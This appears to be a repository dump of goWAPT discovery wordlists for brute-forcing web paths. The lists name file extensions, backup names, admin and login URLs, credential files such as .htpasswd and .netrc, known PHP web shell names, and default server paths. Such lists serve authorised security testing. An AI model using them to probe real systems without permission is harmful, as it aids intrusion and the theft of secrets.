8 | 9 | Theme list generated last on Sept 6 2013 10 | 11 | from: http://themes.svn.wordpress.org 12 | 13 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/filename-dirname-bruteforce/CommonWebExtensions.txt: -------------------------------------------------------------------------------- 1 | .asp 2 | .aspx 3 | .bat 4 | .c 5 | .cfm 6 | .cgi 7 | .com 8 | .dll 9 | .exe 10 | .htm 11 | .html 12 | .inc 13 | .jhtml 14 | .jsa 15 | .jsp 16 | .log 17 | .mdb 18 | .nsf 19 | .php 20 | .php2 21 | .php3 22 | .php4 23 | .php5 24 | .php6 25 | .php7 26 | .phtml 27 | .phps 28 | .pl 29 | .reg 30 | .sh 31 | .shtml 32 | .sql 33 | .txt 34 | .xml 35 | .swf 36 | .pcap 37 | .001 38 | .002 39 | .1 40 | .2 41 | .7z 42 | .Z 43 | .back 44 | .backup 45 | .bak 46 | .bakup 47 | .bas 48 | .bz2 49 | .c 50 | .conf 51 | .copia 52 | .core 53 | .cpp 54 | .dat 55 | .db 56 | .default 57 | .dll 58 | .doc 59 | .ini 60 | .jar 61 | .java 62 | .old 63 | .orig 64 | .pas 65 | .rar 66 | .sav 67 | .saved 68 | .source 69 | .src 70 | .stackdump 71 | .tar 72 | .tar.gz 73 | .temp 74 | .test 75 | .tgz 76 | .tmp 77 | .txt 78 | .war 79 | .zip 80 | ~ 81 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/filename-dirname-bruteforce/Extensions.Backup.txt: -------------------------------------------------------------------------------- 1 | backup 2 | bck 3 | old 4 | save 5 | bak 6 | sav 7 | ~ 8 | copy 9 | old 10 | orig 11 | tmp 12 | txt 13 | back 14 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/filename-dirname-bruteforce/Extensions.Compressed.txt: -------------------------------------------------------------------------------- 1 | 0 2 | 000 3 | 7z 4 | a00 5 | a01 6 | a02 7 | ace 8 | ain 9 | alz 10 | apz 11 | ar 12 | arc 13 | arh 14 | ari 15 | arj 16 | ark 17 | axx 18 | b64 19 | ba 20 | bh 21 | boo 22 
| bz 23 | bz2 24 | bzip 25 | bzip2 26 | c00 27 | c01 28 | c02 29 | car 30 | cb7 31 | cbr 32 | cbt 33 | cbz 34 | cp9 35 | cpgz 36 | cpt 37 | dar 38 | dd 39 | deb 40 | dgc 41 | dist 42 | ecs 43 | efw 44 | epi 45 | f 46 | fdp 47 | gca 48 | gz 49 | gzi 50 | gzip 51 | ha 52 | hbc 53 | hbc2 54 | hbe 55 | hki 56 | hki1 57 | hki2 58 | hki3 59 | hpk 60 | hyp 61 | ice 62 | ipg 63 | ipk 64 | ish 65 | j 66 | jar.pack 67 | jgz 68 | jic 69 | kgb 70 | lbr 71 | lemon 72 | lha 73 | lnx 74 | lqr 75 | lz 76 | lzh 77 | lzm 78 | lzma 79 | lzo 80 | lzx 81 | md 82 | mint 83 | mou 84 | mpkg 85 | mzp 86 | oar 87 | p7m 88 | packgz 89 | package 90 | pae 91 | pak 92 | paq6 93 | paq7 94 | paq8 95 | par 96 | par2 97 | pbi 98 | pcv 99 | pea 100 | pet 101 | pf 102 | pim 103 | pit 104 | piz 105 | pkg 106 | pup 107 | puz 108 | pwa 109 | qda 110 | r0 111 | r00 112 | r01 113 | r02 114 | r03 115 | r1 116 | r2 117 | r30 118 | rar 119 | rev 120 | rk 121 | rnc 122 | rp9 123 | rpm 124 | rte 125 | rz 126 | rzs 127 | s00 128 | s01 129 | s02 130 | s7z 131 | sar 132 | sdc 133 | sdn 134 | sea 135 | sen 136 | sfs 137 | sfx 138 | sh 139 | shar 140 | shk 141 | shr 142 | sit 143 | sitx 144 | spt 145 | sqx 146 | sqz 147 | tar 148 | targz 149 | tarxz 150 | taz 151 | tbz 152 | tbz2 153 | tg 154 | tgz 155 | tlz 156 | tlzma 157 | txz 158 | tz 159 | uc2 160 | uha 161 | vem 162 | vsi 163 | wad 164 | war 165 | wot 166 | xef 167 | xez 168 | xmcdz 169 | xpi 170 | xx 171 | xz 172 | y 173 | yz 174 | z 175 | z01 176 | z02 177 | z03 178 | z04 179 | zap 180 | zfsendtotarget 181 | zip 182 | zipx 183 | zix 184 | zoo 185 | zpi 186 | zz 187 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/filename-dirname-bruteforce/Extensions.Mostcommon.txt: -------------------------------------------------------------------------------- 1 | asp 2 | aspx 3 | php 4 | php3 5 | php4 6 | php5 7 | txt 8 | shtm 9 | shtml 10 | phtm 11 | phtml 12 | jhtml 13 | pl 14 | jsp 15 | cfm 
16 | cfml 17 | py 18 | rb 19 | cfg 20 | zip 21 | pdf 22 | gz 23 | tar 24 | tar.gz 25 | tgz 26 | doc 27 | docx 28 | xls 29 | xlsx 30 | conf 31 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/filename-dirname-bruteforce/Extensions.Skipfish.txt: -------------------------------------------------------------------------------- 1 | 7z 2 | asmx 3 | asp 4 | aspx 5 | bak 6 | bat 7 | bin 8 | bz2 9 | c 10 | cc 11 | cfg 12 | cfm 13 | cgi 14 | class 15 | cnf 16 | conf 17 | config 18 | cpp 19 | cs 20 | csv 21 | dat 22 | db 23 | dll 24 | do 25 | doc 26 | dump 27 | ep 28 | err 29 | error 30 | exe 31 | gif 32 | gz 33 | htm 34 | html 35 | inc 36 | ini 37 | java 38 | jhtml 39 | jpg 40 | js 41 | jsf 42 | jsp 43 | key 44 | lib 45 | log 46 | lst 47 | manifest 48 | mdb 49 | meta 50 | msg 51 | nsf 52 | o 53 | old 54 | ora 55 | orig 56 | out 57 | part 58 | pdf 59 | php 60 | php3 61 | phtml 62 | pl 63 | pm 64 | png 65 | ppt 66 | properties 67 | py 68 | rar 69 | rss 70 | rtf 71 | save 72 | sh 73 | shtml 74 | so 75 | sql 76 | stackdump 77 | swf 78 | tar 79 | tar.bz2 80 | tar.gz 81 | temp 82 | test 83 | tgz 84 | tmp 85 | trace 86 | txt 87 | vb 88 | vbs 89 | ws 90 | xls 91 | xml 92 | xsl 93 | zip 94 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/filename-dirname-bruteforce/copy_of.txt: -------------------------------------------------------------------------------- 1 | Copy_(1)_of_ 2 | Copy_(2)_of_ 3 | Copy%20of%20 4 | Copy_of_ 5 | Copy_ 6 | Copy%20 7 | _ 8 | %20 9 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-large-directories-lowercase.txt: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/dzonerzy/goWAPT/3aed792cbca3ec8f7fbf106c39116b197188924b/wordlist/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-large-directories-lowercase.txt -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-large-directories.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dzonerzy/goWAPT/3aed792cbca3ec8f7fbf106c39116b197188924b/wordlist/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-large-directories.txt -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-large-extensions-lowercase.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dzonerzy/goWAPT/3aed792cbca3ec8f7fbf106c39116b197188924b/wordlist/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-large-extensions-lowercase.txt -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-large-extensions.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dzonerzy/goWAPT/3aed792cbca3ec8f7fbf106c39116b197188924b/wordlist/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-large-extensions.txt -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-large-files-lowercase.txt: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/dzonerzy/goWAPT/3aed792cbca3ec8f7fbf106c39116b197188924b/wordlist/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-large-files-lowercase.txt -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-large-files.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dzonerzy/goWAPT/3aed792cbca3ec8f7fbf106c39116b197188924b/wordlist/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-large-files.txt -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-medium-directories-lowercase.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dzonerzy/goWAPT/3aed792cbca3ec8f7fbf106c39116b197188924b/wordlist/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-medium-directories-lowercase.txt -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-medium-directories.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dzonerzy/goWAPT/3aed792cbca3ec8f7fbf106c39116b197188924b/wordlist/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-medium-directories.txt -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-small-directories-lowercase.txt: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/dzonerzy/goWAPT/3aed792cbca3ec8f7fbf106c39116b197188924b/wordlist/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-small-directories-lowercase.txt -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-small-directories.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dzonerzy/goWAPT/3aed792cbca3ec8f7fbf106c39116b197188924b/wordlist/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-small-directories.txt -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/filename-dirname-bruteforce/test_demo.txt: -------------------------------------------------------------------------------- 1 | test 2 | test1 3 | test2 4 | test00 5 | test01 6 | tests 7 | testing 8 | tst 9 | tsts 10 | probando 11 | prueba 12 | prueba1 13 | prueba2 14 | prueba00 15 | prueba01 16 | pruebas 17 | prova 18 | prova1 19 | prova2 20 | provas 21 | TEST 22 | TESTS 23 | Test 24 | Tests 25 | tester 26 | Pruebas 27 | PRUEBA 28 | PRUEBAS 29 | Prova 30 | Provas 31 | demo 32 | DEMO 33 | Demo 34 | eval 35 | Eval 36 | EVAL 37 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/filename-dirname-bruteforce/upload_variants.txt: -------------------------------------------------------------------------------- 1 | up 2 | upload 3 | uploads 4 | uploaded 5 | upfiles 6 | uploadfiles 7 | uploads 8 | fileupload 9 | uploadedfiles 10 | uploaded_files 11 | upload_files 12 | upload_content 13 | uploaded_content 14 | uploadcontent 15 | uploadedcontent 16 | uploadcertificates 17 | uploaddocuments 18 | upload_certificates 19 | upload_documents 20 | upload_images 21 | uploadimages 22 | uploadedimages 23 | uploaded_images 24 | uploaded_documents 25 | 
uploaded_certificates 26 | upload_test 27 | uploadtest 28 | uploadrequests 29 | upload_report 30 | uploadreport 31 | uploadreports 32 | upload_reports 33 | upload_requests 34 | uploadedreports 35 | uploaded_requests 36 | uploaded_reporst 37 | uploadedrequests 38 | upload_temp 39 | upload_tmp 40 | uploadtmp 41 | uploadtemp 42 | upload2 43 | upload3 44 | upload4 45 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/login-file-locations/Logins.txt: -------------------------------------------------------------------------------- 1 | /admin 2 | /Admin 3 | /admin.asp 4 | /admin.aspx 5 | /admin.cfm 6 | /admin.jsp 7 | /admin.php 8 | /Admin.php 9 | /admin.php4 10 | /admin.pl 11 | /Admin.pl 12 | /admin.py 13 | /admin.rb 14 | /administrator 15 | /Administrator 16 | /administrator.asp 17 | /administrator.aspx 18 | /administrator.cfm 19 | /administrator.jsp 20 | /administrator.php 21 | /Administrator.php 22 | /administrator.php4 23 | /administrator.pl 24 | /administrator.py 25 | /Administrator.py 26 | /administrator.rb 27 | /admnistrator.php3 28 | /cgi-bin/sqwebmail?noframes=1 29 | /default.asp 30 | /exchange/logon.asp 31 | /gs/admin 32 | /index.php?u= 33 | /login 34 | /Login 35 | /login.asp 36 | /login.aspx 37 | /login.cfm 38 | /login.php 39 | /Login.php 40 | /login.php3 41 | /login.php4 42 | /login.pl 43 | /Login.pl 44 | /login.py 45 | /login.rb 46 | /logon 47 | /Logon 48 | /logon.asp 49 | /logon.aspx 50 | /logon.jsp 51 | /logon.php 52 | /Logon.php 53 | /logon.php3 54 | /logon.php4 55 | /logon.pl 56 | /Logon.pl 57 | /logon.py 58 | /logon.rb 59 | /typo3/in 60 | /utilities/TreeView.asp 61 | /webeditor.php 62 | /exchange/logon.asp 63 | /names.nsf?OpenDatabase 64 | /Citrix/NFuse17/ 65 | /citrix/metaframe/default/ 66 | /Citrix/MetaFrameXP/ 67 | /phpmyadmin 68 | /InfoViewApp/logon.jsp 69 | /dana-na/auth/url_default/welcome.cgi 70 | /src/login.php 71 | 72 | 
-------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/password-file-locations/Passwords.txt: -------------------------------------------------------------------------------- 1 | /secring.skr 2 | /secring.pgp 3 | /secring.bak 4 | /passwd 5 | /passwd.bak 6 | /master.passwd 7 | /pwd.db 8 | /htpasswd 9 | /htpasswd.bak 10 | /htgroup 11 | /spwd.db 12 | /htpasswd/htpasswd.bak 13 | /config.php 14 | /phpinfo.php 15 | /passlist 16 | /passlist.txt 17 | /auth_user_file 18 | /administrators.pwd 19 | /admin.mdb 20 | /connect.inc 21 | /globals.inc 22 | /vtund.conf 23 | /password.log 24 | /slapd.conf 25 | /wvdial.conf 26 | /.netrc 27 | /wand.dat 28 | /mrtg.cfg 29 | /zebra.conf 30 | /ospfd.conf 31 | /ccbill.log 32 | /users.mdb 33 | /lilo.conf 34 | /wwwboard/passwd.txt 35 | /db/main.mdb 36 | /sites.ini 37 | /wcx_ftp.ini 38 | /ws_ftp.ini 39 | /flashFXP.ini 40 | /serv-u.ini 41 | /eudora.ini 42 | /unattend.txt 43 | /passwd.txt 44 | /server.cfg 45 | /pass.dat 46 | /phpinfo.php 47 | /admin.dat 48 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/php/PHP.txt: -------------------------------------------------------------------------------- 1 | /phpinfo.php 2 | /test.php 3 | /test1.php 4 | /test2.php 5 | /_index.php 6 | /__index.php 7 | /index.php~ 8 | /index.php-bak 9 | /index-bak 10 | /index.php.bak 11 | /info.php 12 | /phpsecinfo 13 | /php.ini 14 | /php.ini~ 15 | /php 16 | /phpsecinfo 17 | /phpinfo 18 | /phpmyadmin/ 19 | /phpMyAdmin/ 20 | /mysqladmin/ 21 | /MySQLadmin 22 | /MySQLAdmin 23 | /login.php 24 | /logon.php 25 | /xmlrpc.php 26 | /dbadmin 27 | /PMA 28 | /application/configs/application.ini 29 | /awstats 30 | /myadmin -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/php/PHP_CommonBackdoors.txt: 
-------------------------------------------------------------------------------- 1 | c99.php 2 | c99shell.php 3 | r57.php 4 | r58.php 5 | dra.php 6 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/proxy-conf.txt: -------------------------------------------------------------------------------- 1 | /pac/ 2 | /proxy/ 3 | /.pac/ 4 | /managers/ 5 | /admin/ 6 | /employees/ 7 | /users/ 8 | /proxy/pac/ 9 | .pac 10 | proxy.pac 11 | /.pac/.pac 12 | /.pac/proxy.pac 13 | /proxy/.pac 14 | /proxy/proxy.pac 15 | /pac/.pac 16 | /pac/proxy.pac 17 | /managers/.pac 18 | /managers/proxy.pac 19 | /admin/.pac 20 | /admin/proxy.pac 21 | /employees/.pac 22 | /employees/proxy.pac 23 | /users/.pac 24 | /users/proxy.pac 25 | /proxy/pac/proxy.pac 26 | /proxy/pac/.pac 27 | users.pac 28 | admin.pac 29 | managers.pac 30 | employees.pac 31 | guest.pac 32 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/tftp.txt: -------------------------------------------------------------------------------- 1 | # files commonly transmitted via tftp 2 | 000000000000.cfg 3 | 000000000000-directory~.xml 4 | 323tosip1_1.bin 5 | 4601_02_readme_R2_3.txt 6 | 4601dbte1_82.bin 7 | 4602_02SWSIPreadme_R1_1.txt 8 | 4602dbte1_82.bin 9 | 4602sbte1_82.bin 10 | 4610_20_readme_R2_3.txt 11 | 4610_20_readme_SIP_R2_2.txt 12 | 4624_12_06readme_1_8_3.txt 13 | 4625_readme_2_5.txt 14 | 4690_010707.bin 15 | 4690_readme_1_7_7.txt 16 | 46xxreadme_111405.txt 17 | 46xxsettings.txt 18 | 46xxupgrade.scr 19 | a01d01b2_3.bin 20 | a02d01b2_3.bin 21 | a10d01b2_3.bin 22 | a20d01a2_3.bin 23 | a20d01b2_3.bin 24 | a25d01a2_5.bin 25 | b01d01b2_3.bin 26 | b02d01b2_3.bin 27 | b10d01b2_3.bin 28 | b20d01a2_3.bin 29 | b20d01b2_3.bin 30 | b25d01a2_5.bin 31 | bbla0_83.bin 32 | bootrom.ld 33 | cisco_util 34 | CP7912010301SIP050608A.sbin 35 | cvt01_2_3.bin 36 | cvt02_2_3.bin 37 | cvt02sw_2_3.bin 38 | 
def06r1_8_3.bin 39 | def24r1_8_3.bin 40 | dialplan.xml 41 | gkdefault.cfg 42 | infrared.txt 43 | merlin2.pcm 44 | OS79XX.TXT 45 | P003-07-5-00.bin 46 | P003-07-5-00.sbn 47 | P0S3-07-5-00.bin 48 | P0S3-07-5-00.loads 49 | P0S3-07-5-00.sb2 50 | phbook00e011010455.txt 51 | phone1.cfg 52 | release.xml 53 | RINGLIST.DAT 54 | s10d01b2_2.bin 55 | s20d01b2_2.bin 56 | SEP000F34118045.cnf 57 | SEP001562EA69E8.cnf 58 | SEPDefault.cnf 59 | SIP000F34118045.cnf 60 | SIPinsertMAChere.cnf 61 | SIPinsertMAChere.cnf 62 | sip_4602ap1_1.ebin 63 | sip_4602bt1_1.ebin 64 | sip_4602D01A.txt 65 | sip_4602D02A.txt 66 | sip.cfg 67 | SIPDefault.cnf 68 | sip.ld 69 | sipto323_1_1.ebin 70 | sip.ver 71 | SoundPointIPLocalization 72 | SoundPointIPWelcome.wav 73 | syncinfo.xml 74 | test 75 | test.txt 76 | uip200_463enc.pac 77 | uniden00e011030397.txt 78 | unidencom.txt 79 | XMLDefault.cnf.xml 80 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/webservers-appservers/AdobeXML.txt: -------------------------------------------------------------------------------- 1 | /flex2gateway/ 2 | /flex2gateway/http 3 | /flex2gateway/httpsecure 4 | /flex2gateway/cfamfpoolling 5 | /flex2gateway/amf 6 | /flex2gateway/amfpolling 7 | /messagebroker/http 8 | /messagebroker/httpsecure 9 | /blazeds/messagebroker/http 10 | /blazeds/messagebroker/httpsecure 11 | /samples/messagebroker/http 12 | /samples/messagebroker/httpsecure 13 | /lcds/messagebroker/http 14 | /lcds/messagebroker/httpsecure 15 | /lcds-samples/messagebroker/http 16 | /lcds-samples/messagebroker/httpsecure 17 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/webservers-appservers/Apache.txt: -------------------------------------------------------------------------------- 1 | /.htaccess 2 | /.htaccess.bak 3 | /.htpasswd 4 | /.meta 5 | /.web 6 | /apache/logs/access.log 7 | /apache/logs/access_log 8 | 
/apache/logs/error.log 9 | /apache/logs/error_log 10 | /httpd/logs/access.log 11 | /httpd/logs/access_log 12 | /httpd/logs/error.log 13 | /httpd/logs/error_log 14 | /logs/access.log 15 | /logs/access.log 16 | /logs/error.log 17 | /logs/error_log 18 | /access_log 19 | /cgi 20 | /cgi-bin 21 | /cgi-pub 22 | /cgi-script 23 | /dummy 24 | /error 25 | /error_log 26 | /htdocs 27 | /httpd 28 | /httpd.pid 29 | /icons 30 | /index.html 31 | /logs 32 | /manual 33 | /phf 34 | /printenv 35 | /server-info 36 | /server-status 37 | /status 38 | /test-cgi 39 | /tmp 40 | /~bin 41 | /~ftp 42 | /~nobody 43 | /~root 44 | /~toor 45 | /~daemon 46 | /~adm 47 | /~lp 48 | /~sync 49 | /~shutdown 50 | /~halt 51 | /~mail 52 | /~pop 53 | /~postmaster 54 | /~news 55 | /~uucp 56 | /~operator 57 | /~games 58 | /~gopher 59 | /~nscd 60 | /~mailnull 61 | /~ident 62 | /~rpc 63 | /~rpcuser 64 | /~xfs 65 | /~gdm 66 | /~apache 67 | /~http 68 | /~web 69 | /~www 70 | /~adm 71 | /~admin 72 | /~administrator 73 | /~guest 74 | /~firewall 75 | /~fwuser 76 | /~fwadmin 77 | /~fw 78 | /~test 79 | /~testuser 80 | /~user 81 | /~user1 82 | /~user2 83 | /~user3 84 | /~user4 85 | /~user5 86 | /~sql 87 | /~data 88 | /~database 89 | /~db 90 | /~anonymous 91 | /~staff 92 | /~office 93 | /~help 94 | /~helpdesk 95 | /~reception 96 | /~system 97 | /~operator 98 | /~backup 99 | /~vagrant 100 | /~guest 101 | /~mysql 102 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/webservers-appservers/ApacheTomcat.txt: -------------------------------------------------------------------------------- 1 | /examples 2 | /examples/jsp/index.html 3 | /examples/jsp/snp/snoop.jsp 4 | /examples/jsp/source.jsp 5 | /examples/servlet/HelloWorldExample 6 | /examples/servlet/SnoopServlet 7 | /examples/servlet/TroubleShooter 8 | /examples/servlet/default/jsp/snp/snoop.jsp 9 | /examples/servlet/default/jsp/source.jsp 10 | 
/examples/servlet/org.apache.catalina.INVOKER.HelloWorldExample 11 | /examples/servlet/org.apache.catalina.INVOKER.SnoopServlet 12 | /examples/servlet/org.apache.catalina.INVOKER.TroubleShooter 13 | /examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/snp/snoop.jsp 14 | /examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/source.jsp 15 | /examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/snp/snoop.jsp 16 | /examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/source.jsp 17 | /examples/servlet/snoop 18 | /examples/servlets/index.html 19 | /jsp-examples 20 | /manager 21 | /manager/deploy?path=foo 22 | /manager/html/ 23 | /servlet/default/ 24 | /servlet/mstrWebAdmin 25 | /servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.DefaultServlet/tomcat.gif 26 | /servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.SnoopAllServlet 27 | /servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.WebdavServlet/ 28 | /servlet/org.apache.catalina.servlets.DefaultServlet/ 29 | /servlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif 30 | /servlet/org.apache.catalina.servlets.HTMLManagerServlet 31 | /servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif 32 | /servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.SnoopAllServlet 33 | /servlet/org.apache.catalina.servlets.ManagerServlet 34 | /servlet/org.apache.catalina.servlets.SnoopAllServlet 35 | /servlet/org.apache.catalina.servlets.WebdavServlet/ 36 | /tomcat-docs 37 | /webdav 38 | /webdav/index.html 39 | /webdav/servlet/org.apache.catalina.servlets.WebdavServlet/ 40 | /webdav/servlet/webdav/ 41 | /conf/ 42 | /conf/server.xml/ 43 | /WEB-INF/ 44 | /WEB-INF/web.xml 45 | /WEB-INF/classes/ 46 | /shared/ 47 | /shared/lib/ 48 | -------------------------------------------------------------------------------- 
/wordlist/discovery/predictable-filepaths/webservers-appservers/Apache_Axis.txt: -------------------------------------------------------------------------------- 1 | AdminServlet 2 | AxisServlet 3 | EchoHeaders.jws 4 | SOAPMonitor 5 | StockQuoteService.jws 6 | fingerprint.jsp 7 | happyaxis.jsp 8 | i18nLib.jsp 9 | index.html 10 | index.jsp 11 | index.jws 12 | services 13 | services/ 14 | servlet 15 | servlet/AdminServlet 16 | servlet/AxisServlet 17 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/webservers-appservers/Frontpage.txt: -------------------------------------------------------------------------------- 1 | /admin.dll 2 | /admin.exe 3 | /administrators.pwd 4 | /author.dll 5 | /author.exe 6 | /author.log 7 | /authors.pwd 8 | /cgi-bin 9 | /default.htm 10 | /_fpclass 11 | /frontpg.ini 12 | /.htaccess 13 | /iisadmin 14 | /isadmin 15 | /logo.gif 16 | /_private 17 | /queryhit.htm 18 | /QUERYHIT.HTM 19 | /samples 20 | /search 21 | /Search 22 | /service.grp 23 | /service.pwd 24 | /shtml.exe 25 | /srchadm 26 | /users.pwd 27 | /_vti_adm 28 | /_vti_aut 29 | /_vti_bin 30 | /_vti_cnf 31 | /_vti_inf.html 32 | /vti_inf.html 33 | /_vti_log 34 | /_vti_pvt 35 | /_vti_txt 36 | /_vti_bin/_vti_aut/author.dll 37 | /_vti_bin/shtml.exe?_vti_rp 38 | 39 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/webservers-appservers/HTTP_POST_Microsoft.txt: -------------------------------------------------------------------------------- 1 | # Interesting Microsoft IIS files which require being scanned for with the HTTP POST verb 2 | /msadc/msadcs.dll/VbBusObj.VbBusObjCls.GetMachineName 3 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/webservers-appservers/JBoss.txt: -------------------------------------------------------------------------------- 1 | /jmx-console 2 | 
/web-console 3 | /web-console/Invoker 4 | /invoker/JMXInvokerServlet 5 | /WEB-INF/jboss-web.xml 6 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/webservers-appservers/JRun.txt: -------------------------------------------------------------------------------- 1 | /compass/logon.jsp 2 | /databasenotes.html 3 | /flash/java/javabean/FlashJavaBean.html 4 | /jrunscripts 5 | /jstl-war/index.html 6 | /SmarTicketApp/index.html 7 | /techniques/servlets/index.html 8 | /travelnet/home.jsp 9 | /WEB-INF/webapp.properties 10 | /WEB-INF/web.xml 11 | /worldmusic/action/catalog 12 | /worldmusic/action/cdlist 13 | /ws-client/loanCalculation.jsp 14 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/webservers-appservers/JavaServlets_Common.txt: -------------------------------------------------------------------------------- 1 | /DWREasyAjax/dwr/index.html 2 | /dwr/index.html 3 | /dwr/engine.js 4 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/webservers-appservers/Netware.txt: -------------------------------------------------------------------------------- 1 | /ICHAINErrors 2 | /ICSLogin 3 | /ICHAINLogout 4 | /ICSIBroker 5 | /NetStorage 6 | /iManager 7 | /eMFrame 8 | /oneNet 9 | /ICHAIN 10 | /ICS 11 | /NSearch 12 | /SearchServlet 13 | /site 14 | /home.html 15 | /iFolder 16 | /update 17 | /webacc 18 | /nps 19 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/webservers-appservers/Oracle9i.txt: -------------------------------------------------------------------------------- 1 | /CookieExample 2 | /Counter 3 | /DateServlet 4 | /HelloWorldServlet 5 | /RequestParamExample 6 | /SessionExample 7 | /SessionServlet 8 | /SimpleServlet 9 | /SnoopServlet 10 | /basic 11 | /cal 12 | /cgi-bin 13 | 
/echo 14 | /examples 15 | /fcgi-bin 16 | /hellouser 17 | /hellouser.jsp 18 | /j2ee 19 | /jsp 20 | /login.html 21 | /ojspdemos 22 | /perl 23 | /printenv 24 | /servlet 25 | /simple 26 | /snoop.jsp 27 | /snp 28 | /usebean.jsp 29 | /welcomeuser.jsp 30 | /pls 31 | /SIMPLEDAD 32 | /HTMLDB 33 | /ORASSO 34 | /SSODAD 35 | /PORTAL 36 | /PORTAL2 37 | /PORTAL30 38 | /PORTAL30_SSO 39 | /TEST 40 | /DAD 41 | /APP 42 | /ONLINE 43 | /DB 44 | /OWA 45 | /simpledad 46 | /htmldb 47 | /orasso 48 | /ssodad 49 | /portal 50 | /portal2 51 | /portal30 52 | /portal30_sso 53 | /test 54 | /dad 55 | /app 56 | /online 57 | /db 58 | /owa 59 | /null 60 | /pls/dad/null 61 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/webservers-appservers/Ruby_Rails.txt: -------------------------------------------------------------------------------- 1 | .gitignore 2 | Gemfile 3 | README 4 | README.rdoc 5 | Rakefile 6 | app 7 | app/assets/images/rails.png 8 | app/assets/javascripts/application.js 9 | app/assets/stylesheets/application.css 10 | app/controllers 11 | app/controllers/admin_controller.rb 12 | app/controllers/application.rb 13 | app/controllers/application_controller.rb 14 | app/helpers/application_helper.rb 15 | app/mailers 16 | app/mailers/.gitkeep 17 | app/models 18 | app/models/.gitkeep 19 | app/views/layouts/application.html.erb 20 | config 21 | config.ru 22 | config/application.rb 23 | config/boot.rb 24 | config/database.yml 25 | config/deploy.rb 26 | config/environment.rb 27 | config/environments 28 | config/environments/development.rb 29 | config/environments/production.rb 30 | config/environments/test.rb 31 | config/initializers 32 | config/initializers/backtrace_silencers.rb 33 | config/initializers/inflections.rb 34 | config/initializers/mime_types.rb 35 | config/initializers/secret_token.rb 36 | config/initializers/session_store.rb 37 | config/initializers/wrap_parameters.rb 38 | config/locales 39 | 
